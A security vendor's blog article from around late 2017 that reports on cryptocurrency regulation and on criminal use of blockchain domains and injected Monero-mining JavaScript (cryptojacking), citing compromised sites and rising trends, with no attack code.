Malicious Trends: JavaScript Cryptojacking on Steroids Wins the Cycle Race

Malicious Trends: JavaScript Cryptojacking on Steroids Wins the Cycle Race

cryptojacking abstract 2In this article, we will look at recent developments in cryptocurrency, from a regulatory perspective and developments in cybercrime adoption.

Cryptocurrency is hot. According to coinmarketcap.com, there are now over 1300 cryptocurrencies with new initial coin offerings (ICOs) accelerating all the time. We are seeing the beginning of regulatory acceptance as the British territory Gibraltar’s Financial Services Commission offers a new regulatory framework for Distributed Ledger Technology (DLT). The new framework will become operational as of January 2018 and will regulate the activities of firms operating in or from Gibraltar that use DLT to store or transmit value belonging to others, such as virtual currency exchanges.

Distributed Ledger Technology

In a discussion paper released by the British government, a distributed ledger is essentially an asset database that can be shared across a network of multiple sites, geographies or institutions. All participants within a network can have their own identical copy of the ledger, and any changes to the ledger are reflected in all copies in minutes, or in some cases, seconds. The assets can be financial, legal, physical or electronic. The security and accuracy of the assets stored in the ledger are maintained cryptographically through the use of ‘keys’ and signatures to control who can do what within the shared ledger. Entries also can be updated by one, some or all of the participants, according to rules adopted by the network. Blockchain, the underlying Distributed Ledger Technology used by Bitcoin, is the best know. More on DLT from the UK Government Chief Scientific Adviser.

Currently, the price trajectory of Bitcoin is higher than a North Korean rocket, and Blockchain is saving the world, one application at a time. It will be interesting to see how increased regulation impacts the value of Bitcoin and its rivals.

Cybercrime, which quickly adopted cryptocurrency as the payment method in the ransomware plague, is now turning its eye to other uses for cryptocurrency technology. Firstly we are seeing stolen account and credit card shops use the peer-to-peer DNS technology in Blockchain as a technique for bulletproofing their offerings. Jokers Stash (see Figure A), which has been linked to the Sonic Drive-In breach, is using .bazar top-level domains as an alternative to traditional DNS and tor-based naming systems. Secondly, the bandwagon for placing javascript that operates a coin mining function onto vulnerable websites and referred adverts, #minevertising, has started to gallop away.

Figure A: Joker’s Stash website offering stolen account details uses a .bazaar domain, as shown in the URL at the top of this screen shot

Figure A: Joker’s Stash website offering stolen account details uses a .bazar domain, as shown in the URL at the top of this screen shot.

Cryptojacking

We are seeing a few adverts (see Figure B) on the dark markets offering to inject Monero javascript coin miners with a criminal’s unique identifier. The result is that anyone who visits a compromised website is infected with malware that hijacks 100% of its CPU cycles to mine Monero cryptocurrency on the criminal’s behalf. This activity has been named #crytpojacking.

cryptojacking online advert offering Monero mining malware

Figure B: Online advert offering Monero mining malware.

A stream of high profile sites has fallen victim to being injected with mining javascript from coinhive.com. CBS’s showtime.com and cristianoronaldo.com (see Figure C) are probably the two most notable cases to date.

Figure C: cristianoronaldo.com is one of the websites that was found to be compromised with cryptojacking malware

Figure C: cristianoronaldo.com is one of the websites that was found to be compromised with cryptojacking malware.

When we look into the trend of the referred domains in cryptojacking javascript, we see a 700% increase from August to November in exploits that include a cryptojacking payload. Figure D shows the increase and the most popular mining domains.

Figure D: Coinhive.com has replaced poolminexmr.com as the most popular mining domain

Figure D: Coinhive.com has replaced poolminexmr.com as the most popular mining domain.

Cryptojacking payloads look set to become a mainstream attack in 2018. We may even see this method of monetisation, which requires the victim to do nothing, take over from current ransomware options that require victims to actively make the ransom payment.

Andy Norton

Andy Norton

Andy has been involved in cyber security best practice for over 20 years, specializing in establishing emerging security technologies at Symantec, Cisco and FireEye. In that time, he has presented threat and intelligence briefings for both Bush and Obama administrations, The Cabinet office, the Foreign and Commonwealth office, SWIFT, Swiss National Bank, Prudential Regulation Authority, the Bank of England, The Hong Kong Monetary Authority and NASA. Returning to Europe from Asia in 2011, he has spent the past 5 years helping many of the FTSE 250 companies measure, manage and respond to cyber incidents.
Andy Norton